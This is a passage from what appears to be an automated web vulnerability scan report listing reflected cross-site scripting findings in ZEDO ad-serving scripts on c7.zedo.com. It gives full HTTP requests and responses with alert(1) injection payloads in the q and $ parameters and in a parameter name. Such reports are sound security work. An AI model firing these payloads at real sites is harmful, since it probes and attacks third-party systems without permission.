The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e516d"%3balert(1)//8a8f531ed29 was submitted in the q parameter. This input was echoed as e516d";alert(1)//8a8f531ed29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=e516d"%3balert(1)//8a8f531ed29&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='e516d";alert(1)//8a8f531ed29';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=e516d";alert(1)//8a8f531ed29;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.87. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed98c"%3balert(1)//2c617412c80 was submitted in the q parameter. This input was echoed as ed98c";alert(1)//2c617412c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=ed98c"%3balert(1)//2c617412c80&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='ed98c";alert(1)//2c617412c80';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=ed98c";alert(1)//2c617412c80;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.88. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44fa'%3balert(1)//438e80c48dc was submitted in the q parameter. This input was echoed as f44fa';alert(1)//438e80c48dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=f44fa'%3balert(1)//438e80c48dc&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=132
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:52 GMT
Connection: close
Content-Length: 2521

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='f44fa';alert(1)//438e80c48dc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=f44fa';alert(1)//438e80c48dc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.89. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38718"%3balert(1)//62cf392d211 was submitted in the $ parameter. This input was echoed as 38718";alert(1)//62cf392d211 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=38718"%3balert(1)//62cf392d211&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:38718";alert(1)//62cf392d211;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',38718";alert(1)//62cf392d211';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,38718";alert(1)//62cf392d211;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.90. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aa1'%3balert(1)//71dd49f8f74 was submitted in the $ parameter. This input was echoed as 98aa1';alert(1)//71dd49f8f74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=98aa1'%3balert(1)//71dd49f8f74&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:98aa1';alert(1)//71dd49f8f74;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=125
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:59 GMT
Connection: close
Content-Length: 2512

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',98aa1';alert(1)//71dd49f8f74';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,98aa1';alert(1)//71dd49f8f74;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce34c'-alert(1)-'2c607e7cd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?ce34c'-alert(1)-'2c607e7cd20=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=403
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:11 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=ce34c'-alert(1)-'2c607e7cd20=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.92. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb1'%3balert(1)//8a1d92bd133 was submitted in the q parameter. This input was echoed as c7cb1';alert(1)//8a1d92bd133 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=c7cb1'%3balert(1)//8a1d92bd133&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=126
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:58 GMT
Connection: close
Content-Length: 2509

